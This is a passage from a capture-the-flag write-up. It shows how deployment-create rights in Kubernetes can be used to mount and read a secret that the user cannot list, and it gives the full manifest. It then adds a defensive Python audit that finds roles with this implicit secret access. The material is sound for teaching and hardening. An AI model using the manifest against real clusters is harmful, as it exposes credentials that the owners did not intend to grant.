Using `kubectl auth can-i --list`, we see that we can't access secrets anymore, but we can create deployments.
Looking at the existing pod, we see that it mounts a secret called `y0u-cant-l1st-m3-s3crets-n0w`, but it only outputs the hash and we can't exec into it in this challenge.
We can create a deployment similar to the existing pod, but without the hashing:
```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: flag-getter
spec:
  replicas: 1
  selector:
    matchLabels:
      app: flag-getter
  template:
    metadata:
      labels:
        app: flag-getter
    spec:
      containers:
      - command:
        - cat
        - /flag/flag
        image: busybox
        imagePullPolicy: IfNotPresent
        name: flag-getter
        volumeMounts:
        - mountPath: /flag
          name: flag
      volumes:
      - name: flag
        secret:
          secretName: y0u-cant-l1st-m3-s3crets-n0w
```
The container exits immediately, but that's fine - just read the pod logs, which will contain the flag.
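
From the cluster owner's side, the lesson is that `create` on any workload resource is equivalent to read access on every secret in that namespace. The audit below is an added example, not part of the original write-up: it takes Role objects in the shape found under `items` in `kubectl get roles -A -o json` and flags roles that can create workloads without being granted direct read on secrets. The role names and namespace are constructed sample data.

```python
# Resources whose spec embeds a pod template. Creating one lets the creator
# mount any Secret in the same namespace, whatever their rights on "secrets".
WORKLOADS = {"pods", "deployments", "replicasets", "statefulsets",
             "daemonsets", "jobs", "cronjobs", "replicationcontrollers"}
READ_VERBS = {"get", "list", "watch"}


def grants(rule, verbs, resources):
    """True if one RBAC rule allows any of `verbs` on any of `resources`."""
    rule_verbs = set(rule.get("verbs", []))
    rule_res = set(rule.get("resources", []))
    verb_ok = "*" in rule_verbs or bool(rule_verbs & verbs)
    res_ok = "*" in rule_res or bool(rule_res & resources)
    return verb_ok and res_ok


def implicit_secret_readers(roles):
    """Return (namespace, name) for Roles that can create workloads but have
    no direct read on secrets: the gap between intent and effect."""
    findings = []
    for role in roles:
        rules = role.get("rules") or []
        can_create = any(grants(r, {"create"}, WORKLOADS) for r in rules)
        can_read = any(grants(r, READ_VERBS, {"secrets"}) for r in rules)
        if can_create and not can_read:
            meta = role["metadata"]
            findings.append((meta.get("namespace", ""), meta["name"]))
    return findings


# Constructed sample input (not taken from the challenge cluster).
SAMPLE_ROLES = [
    {"metadata": {"namespace": "ctf", "name": "deployer"},
     "rules": [{"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["create", "get"]},
               {"apiGroups": [""], "resources": ["pods", "pods/log"], "verbs": ["get", "list"]}]},
    {"metadata": {"namespace": "ctf", "name": "viewer"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
    {"metadata": {"namespace": "ctf", "name": "admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
]

if __name__ == "__main__":
    for ns, name in implicit_secret_readers(SAMPLE_ROLES):
        print(f"{ns}/{name}: can create workloads, so can mount and read secrets")
```

The check ignores `apiGroups` and `resourceNames` for brevity, so treat its output as a list of roles to review rather than a complete verdict.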